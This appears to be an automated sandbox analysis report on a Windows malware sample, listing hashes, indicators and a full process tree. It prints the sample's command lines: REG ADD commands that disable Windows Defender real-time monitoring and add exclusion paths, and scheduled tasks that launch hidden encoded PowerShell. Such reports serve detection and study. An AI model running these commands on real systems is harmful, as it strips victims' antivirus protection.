Analysis
max time kernel: 150s
max time network: 141s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 31/10/2022, 22:05

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220901-en
General
Target: file.exe
Size: 7.3MB
MD5: a75ccd9681b2073ff1bf782d3a285592
SHA1: 0cc720ea0d98bccc8a3807f9288e2bd05fc815fb
SHA256: 7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191
SHA512: 9e6d5ca17bf4916f7bd05b2e3709b1d58a728f33ae27de335cd979795507f9b5746b42fbef52149868a53ecd438a270c638bfbd2e1bf6ab37203478b49e9708f
SSDEEP: 196608:91O1gxD17+PqlqyIIZH9MjTCuFwwO125FdW0:3O1iD1a2ZdMjTCYusFdn
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe

Windows security bypass
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Executes dropped EXE (3 IoCs)
pid | Process
824 | Install.exe
936 | Install.exe
852 | rdCtdiR.exe
Checks BIOS information in registry (2 TTPs, 1 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Loads dropped DLL (8 IoCs)
pid | Process
1380 | file.exe
824 | Install.exe
824 | Install.exe
824 | Install.exe
824 | Install.exe
936 | Install.exe
936 | Install.exe
936 | Install.exe
Drops file in System32 directory (7 IoCs)
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | rdCtdiR.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | rdCtdiR.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | rdCtdiR.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
Drops file in Windows directory (1 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job | schtasks.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
780 | schtasks.exe
1956 | schtasks.exe
1728 | schtasks.exe
2008 | schtasks.exe
Enumerates system info in registry (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS (9 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Suspicious behavior: EnumeratesProcesses (9 IoCs)
pid | Process
396 | powershell.EXE
396 | powershell.EXE
396 | powershell.EXE
780 | powershell.EXE
780 | powershell.EXE
780 | powershell.EXE
2040 | powershell.EXE
2040 | powershell.EXE
2040 | powershell.EXE
Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 396 | powershell.EXE
Token: SeDebugPrivilege | 780 | powershell.EXE
Token: SeDebugPrivilege | 2040 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | count
PID 1380 wrote to memory of 824 | 1380 | file.exe | 27 | 7
PID 824 wrote to memory of 936 | 824 | Install.exe | 28 | 7
PID 936 wrote to memory of 2028 | 936 | Install.exe | 30 | 7
PID 936 wrote to memory of 1328 | 936 | Install.exe | 32 | 7
PID 1328 wrote to memory of 1440 | 1328 | forfiles.exe | 35 | 7
PID 2028 wrote to memory of 1376 | 2028 | forfiles.exe | 34 | 7
PID 1440 wrote to memory of 960 | 1440 | cmd.exe | 36 | 7
PID 1376 wrote to memory of 288 | 1376 | cmd.exe | 37 | 7
PID 1376 wrote to memory of 1580 | 1376 | cmd.exe | 38 | 7
PID 1440 wrote to memory of 592 | 1440 | cmd.exe | 39 | 1
Processes
[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    Command: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1380
    [2] C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
        Command: .\Install.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 824
        [3] C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
            Command: .\Install.exe /S /site_id "525403"
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Loads dropped DLL
            - Drops file in System32 directory
            - Enumerates system info in registry
            - Suspicious use of WriteProcessMemory
            PID: 936
            [4] C:\Windows\SysWOW64\forfiles.exe
                Command: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                PID: 2028
                [5] C:\Windows\SysWOW64\cmd.exe
                    Command: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    PID: 1376
                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        PID: 288
                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                        PID: 1580
            [4] C:\Windows\SysWOW64\forfiles.exe
                Command: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                PID: 1328
                [5] C:\Windows\SysWOW64\cmd.exe
                    Command: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    PID: 1440
                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        PID: 960
                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                        PID: 592
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command: schtasks /CREATE /TN "gEhzvxrPb" /SC once /ST 09:41:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                - Creates scheduled task(s)
                PID: 780
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command: schtasks /run /I /tn "gEhzvxrPb"
                PID: 1600
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command: schtasks /DELETE /F /TN "gEhzvxrPb"
                PID: 848
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command: schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 22:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe\" KP /site_id 525403 /S" /V1 /F
                - Drops file in Windows directory
                - Creates scheduled task(s)
                PID: 1956

[1] C:\Windows\system32\taskeng.exe
    Command: taskeng.exe {9A6228B2-40B6-4D89-A88A-102951D5FBBE} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
    PID: 524
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 396
        [3] C:\Windows\system32\gpupdate.exe
            Command: "C:\Windows\system32\gpupdate.exe" /force
            PID: 964
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 780
        [3] C:\Windows\system32\gpupdate.exe
            Command: "C:\Windows\system32\gpupdate.exe" /force
            PID: 1276
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2040
        [3] C:\Windows\system32\gpupdate.exe
            Command: "C:\Windows\system32\gpupdate.exe" /force
            PID: 1092

[1] C:\Windows\system32\gpscript.exe
    Command: gpscript.exe /RefreshSystemParam
    PID: 1124

[1] C:\Windows\system32\taskeng.exe
    Command: taskeng.exe {1B3DA9EC-DE32-43E4-AFF8-296227E6196C} S-1-5-18:NT AUTHORITY\System:Service:
    PID: 1596
    [2] C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe
        Command: C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe KP /site_id 525403 /S
        - Executes dropped EXE
        - Drops file in System32 directory
        PID: 852
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /CREATE /TN "gLdoXkBXq" /SC once /ST 17:46:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)
            PID: 1728
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /run /I /tn "gLdoXkBXq"
            PID: 880
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /DELETE /F /TN "gLdoXkBXq"
            PID: 1136
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            PID: 1780
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                - Modifies Windows Defender Real-time Protection settings
                PID: 2032
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
            PID: 1956
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                - Modifies Windows Defender Real-time Protection settings
                PID: 1696
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /CREATE /TN "gPZLeWFxT" /SC once /ST 01:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)
            PID: 2008
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /run /I /tn "gPZLeWFxT"
            PID: 820
        [3] C:\Windows\SysWOW64\schtasks.exe
            Command: schtasks /DELETE /F /TN "gPZLeWFxT"
            PID: 912
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
            PID: 1916
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1620
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
            PID: 992
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 1368
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
            PID: 1948
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
                PID: 1276
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
            PID: 1768
            [4] C:\Windows\SysWOW64\reg.exe
                Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
                PID: 700
        [3] C:\Windows\SysWOW64\cmd.exe
            Command: cmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"
            PID: 548
        [3] C:\Windows\SysWOW64\wscript.exe
            Command: wscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"
            - Modifies data under HKEY_USERS
            PID: 1780
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1188
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 544
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1056
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 1440
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1376
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 2040
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1124
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 1908
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1652
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 1700
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1972
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 1472
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 1648
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64
                - Windows security bypass
                PID: 812
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
                - Windows security bypass
                PID: 276
            [4] C:\Windows\SysWOW64\reg.exe
                Command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
                PID: 1720

[1] C:\Windows\system32\gpscript.exe
    Command: gpscript.exe /RefreshSystemParam
    PID: 1624

[1] C:\Windows\system32\gpscript.exe
    Command: gpscript.exe /RefreshSystemParam
    PID: 1340
Network
MITRE ATT&CK Enterprise v6
Downloads